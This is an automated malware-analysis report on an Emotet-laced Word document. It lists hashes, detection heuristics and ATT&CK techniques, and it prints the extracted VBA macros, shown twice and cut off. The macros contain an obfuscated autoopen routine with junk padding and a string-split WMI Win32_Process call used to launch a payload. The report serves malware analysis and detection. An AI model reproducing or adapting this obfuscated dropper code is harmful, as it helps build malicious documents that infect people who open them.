Emotet Office (OLE) malware analysis — malicious · 61363331b4ed5c21

MALICIOUS

Office (OLE)

159.0 KB Created: 2019-05-02 13:11:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: dc5a7a21ddce76da8ae22f2a3f145de4 SHA-1: 8b23a62029eb98ce44a9183ac64bd682356ad065 SHA-256: 61363331b4ed5c211a5108f4820e0e7b31451bb9fb50da87d537b88e01159528

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample contains VBA macros, including an AutoOpen macro, and triggers critical heuristics for WMI process creation. This indicates the macro is designed to launch a secondary payload. The ClamAV signature explicitly identifies it as Emotet, a known banking trojan and downloader.

Heuristics 7

ClamAV: Doc.Malware.Emotet-6960319-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emotet-6960319-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27709 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	27709 bytes
SHA-256: `41fac209311f24e9858e0b4de5bb970c035309171e1b5eda3c96fc2f21a08c59`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "i_7_49" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "W452789" Attribute VB_Base = "0{26B1CED9-294D-4291-96ED-B3DA0540AACB}{1BEB1573-C98A-42BD-9D5A-463FD125D331}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "w5417665" Attribute VB_Name = "P71257" Attribute VB_Base = "0{7CF31FA9-AE4B-427D-B00C-EBD14E5E8970}{60A09B9E-71C1-4118-9058-BC529E75E6FB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "w_8365_6" Function k45__2(V4_600) Select Case N37503 Case o98_12 = F5_979 = Sgn(915663398) Case R46_782 = U8499112 Case Y613_6 = Log(s3964_17) Case J31742 = CBool(770043342) Case O8095892 = 948052885 Case Z64_45 = CDate(Q49329_9) End Select Select Case i3872843 Case v7__1366 = K865519 = Sgn(219551326) Case n035125 = i5451_5 Case K85848 = Log(l3210249) Case S7_001 = CBool(993609842) Case u456_2 = 541530122 Case I16601 = CDate(S584_7) End Select Set k45__2 = CVar(V4_600) Select Case O68469 Case j4_18073 = z961953_ = Sgn(260716006) Case f642160 = W24996 Case S449731 = Log(N931660) Case m80858 = CBool(34746207) Case t694450 = 596061870 Case w133453 = CDate(z0756884) End Select Select Case D6917810 Case P00_173 = w4660_1 = Sgn(182749233) Case r31422 = A79538 Case l30051__ = Log(i_01765) Case N379985 = CBool(173061214) Case Z2950394 = 759976378 Case O2_6754_ = CDate(B73092) End Select End Function Sub autoopen() Select Case s_8_45_3 Case f6028821 = T78_36 = Sgn(89678378) Case b67158_4 = o1776794 Case s97216 = Log(l904537) Case V5595338 = CBool(147661988) Case H4530329 = 941363160 Case v5771_ = CDate(R_27500) End Select Select Case B46719 Case B902772 = c1031__2 = Sgn(583902484) Case i13034 = T23150_ Case N650_80 = Log(p_4766_7) Case b_03_669 = CBool(361303888) Case W296015 = 171051730 Case U266930 = CDate(E9018653) End Select Select Case T145343 Case R655895 = p086_2 = Sgn(21578397) Case I7101639 = p_0264_6 Case W1992260 = Log(J41512) Case Y030385 = CBool(302452967) Case L2_70552 = 810010039 Case v15_675_ = CDate(S16138) End Select Call F7_2116 Select Case p90899 Case I28781_ = P848_25 = Sgn(379163554) Case b6364785 = m44227 Case B877458 = Log(V07546) Case A_85__ = CBool(546830911) Case f_4274 = 339284241 Case h4_2005 = CDate(i28506) End Select Select Case t_6993 Case q4392_ = w8_2274 = Sgn(35180138) Case f55071 = z64247_ Case N64_187 = Log(O_03856) Case q8_92_7 = CBool(4062587) Case r45253 = 17643203 Case F7898_9_ = CDate(r078_215) End Select Select Case z73643 Case G38789 = n2_8048 = Sgn(882778830) Case E030459_ = M4948_2 Case a62_24 = Log(n38_45) Case l03_49 = CBool(663889470) Case G647__24 = 608058999 Case z01774 = CDate(J80023_1) End Select End Sub Attribute VB_Name = "W136440" Function F7_2116() On Error Resume Next Select Case F86813 Case B0587_35 = f63365_ = Sgn(280587394) Case H320_130 = K513_37 Case H576021 = Log(J1997479) Case k795156 = CBool(185070932) Case N30796 = 418098894 Case M8014848 = CDate(m826_8_5) End Select Select Case P_557_ Case H343062 = F758_627 = Sgn(487222661) Case z90_322 = T24537 Case I_5793 = Log(D44540) Case D74541 = CBool(798423184) Case I4_316 = 335236939 Case W7613608 = CDate(m7_71347) End Select Set M_375173 = k45__2(GetObject("wi" _ + "nmg" + "mts:W" _ + "in32_P" + "rocess" _ + "Sta" + "rtup")) Select Case M50341 Case U21241_8 = I25938 = Sgn(64998561) Case z97864 = j30_438 Case q609925 = Log(a05332) Case S2067906 = CBool(33 ... (truncated)

SHA-256: 41fac209311f24e9858e0b4de5bb970c035309171e1b5eda3c96fc2f21a08c59

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "i_7_49"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "W452789"
Attribute VB_Base = "0{26B1CED9-294D-4291-96ED-B3DA0540AACB}{1BEB1573-C98A-42BD-9D5A-463FD125D331}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w5417665"

Attribute VB_Name = "P71257"
Attribute VB_Base = "0{7CF31FA9-AE4B-427D-B00C-EBD14E5E8970}{60A09B9E-71C1-4118-9058-BC529E75E6FB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w_8365_6"
Function k45__2(V4_600)
   Select Case N37503
Case o98_12 = F5_979 = Sgn(915663398)
Case R46_782 = U8499112
Case Y613_6 = Log(s3964_17)
Case J31742 = CBool(770043342)
Case O8095892 = 948052885
Case Z64_45 = CDate(Q49329_9)
End Select
   Select Case i3872843
Case v7__1366 = K865519 = Sgn(219551326)
Case n035125 = i5451_5
Case K85848 = Log(l3210249)
Case S7_001 = CBool(993609842)
Case u456_2 = 541530122
Case I16601 = CDate(S584_7)
End Select
Set k45__2 = CVar(V4_600)
   Select Case O68469
Case j4_18073 = z961953_ = Sgn(260716006)
Case f642160 = W24996
Case S449731 = Log(N931660)
Case m80858 = CBool(34746207)
Case t694450 = 596061870
Case w133453 = CDate(z0756884)
End Select
   Select Case D6917810
Case P00_173 = w4660_1 = Sgn(182749233)
Case r31422 = A79538
Case l30051__ = Log(i_01765)
Case N379985 = CBool(173061214)
Case Z2950394 = 759976378
Case O2_6754_ = CDate(B73092)
End Select
End Function
Sub autoopen()
   Select Case s_8_45_3
Case f6028821 = T78_36 = Sgn(89678378)
Case b67158_4 = o1776794
Case s97216 = Log(l904537)
Case V5595338 = CBool(147661988)
Case H4530329 = 941363160
Case v5771_ = CDate(R_27500)
End Select
   Select Case B46719
Case B902772 = c1031__2 = Sgn(583902484)
Case i13034 = T23150_
Case N650_80 = Log(p_4766_7)
Case b_03_669 = CBool(361303888)
Case W296015 = 171051730
Case U266930 = CDate(E9018653)
End Select
   Select Case T145343
Case R655895 = p086_2 = Sgn(21578397)
Case I7101639 = p_0264_6
Case W1992260 = Log(J41512)
Case Y030385 = CBool(302452967)
Case L2_70552 = 810010039
Case v15_675_ = CDate(S16138)
End Select
Call F7_2116
   Select Case p90899
Case I28781_ = P848_25 = Sgn(379163554)
Case b6364785 = m44227
Case B877458 = Log(V07546)
Case A_85__ = CBool(546830911)
Case f_4274 = 339284241
Case h4_2005 = CDate(i28506)
End Select
   Select Case t_6993
Case q4392_ = w8_2274 = Sgn(35180138)
Case f55071 = z64247_
Case N64_187 = Log(O_03856)
Case q8_92_7 = CBool(4062587)
Case r45253 = 17643203
Case F7898_9_ = CDate(r078_215)
End Select
   Select Case z73643
Case G38789 = n2_8048 = Sgn(882778830)
Case E030459_ = M4948_2
Case a62_24 = Log(n38_45)
Case l03_49 = CBool(663889470)
Case G647__24 = 608058999
Case z01774 = CDate(J80023_1)
End Select
End Sub

Attribute VB_Name = "W136440"
Function F7_2116()
On Error Resume Next
   Select Case F86813
Case B0587_35 = f63365_ = Sgn(280587394)
Case H320_130 = K513_37
Case H576021 = Log(J1997479)
Case k795156 = CBool(185070932)
Case N30796 = 418098894
Case M8014848 = CDate(m826_8_5)
End Select
   Select Case P_557_
Case H343062 = F758_627 = Sgn(487222661)
Case z90_322 = T24537
Case I_5793 = Log(D44540)
Case D74541 = CBool(798423184)
Case I4_316 = 335236939
Case W7613608 = CDate(m7_71347)
End Select
Set M_375173 = k45__2(GetObject("wi" _
+ "nmg" + "mts:W" _
+ "in32_P" + "rocess" _
+ "Sta" + "rtup"))
   Select Case M50341
Case U21241_8 = I25938 = Sgn(64998561)
Case z97864 = j30_438
Case q609925 = Log(a05332)
Case S2067906 = CBool(33
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.